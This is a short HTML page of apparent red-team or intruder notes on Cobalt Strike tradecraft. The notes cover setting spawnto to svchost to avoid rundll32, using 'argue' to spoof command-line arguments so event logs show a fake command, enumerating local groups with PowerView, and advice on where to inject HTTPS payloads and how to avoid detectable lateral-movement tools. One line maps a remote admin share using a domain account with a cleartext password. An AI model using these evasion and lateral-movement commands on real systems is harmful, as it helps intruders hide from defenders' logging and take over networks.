<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SAFETY</title>
</head><body>use spawnto_x86 %windir%\syswow64\svchost.exe &nbsp;in order to not use rundll32<br/>
<br/>
spawnto x86 %windir%\syswow64\svchost.exe<br/>
spawnto x64 %windir%\sysnative\svchost.exe<br/>
<br/>
use argue command<br/>
<br/>
command 1 = argue ipconfig what is this?<br/>
<br/>
command 2 = run ipconfig /all<br/>
<br/>
The machine will run "ipconfig /all", but show under event logs that you ran "ipconfig what is this?" <br/>
<br/>
<br/>
<br/>
Get-NetLocalGroup -COmputerName &lt;computername&gt; -GroupName "&lt;groupname&gt;"<br/>
<br/>
shell net use \\ARGON\C$ /U:CITADEL\bharris_a vek3irj1shKt! <br/>
<br/>
do not inject HTTPS payloads into anything other than explorer<br/>
<br/>
Coballt Strike<br/>
<br/>
Do not use net commands native to CS<br/>
Do not laterally move with built in cobalt strike tools<br/>
<br/>
<br/>
<br/>
</body></html>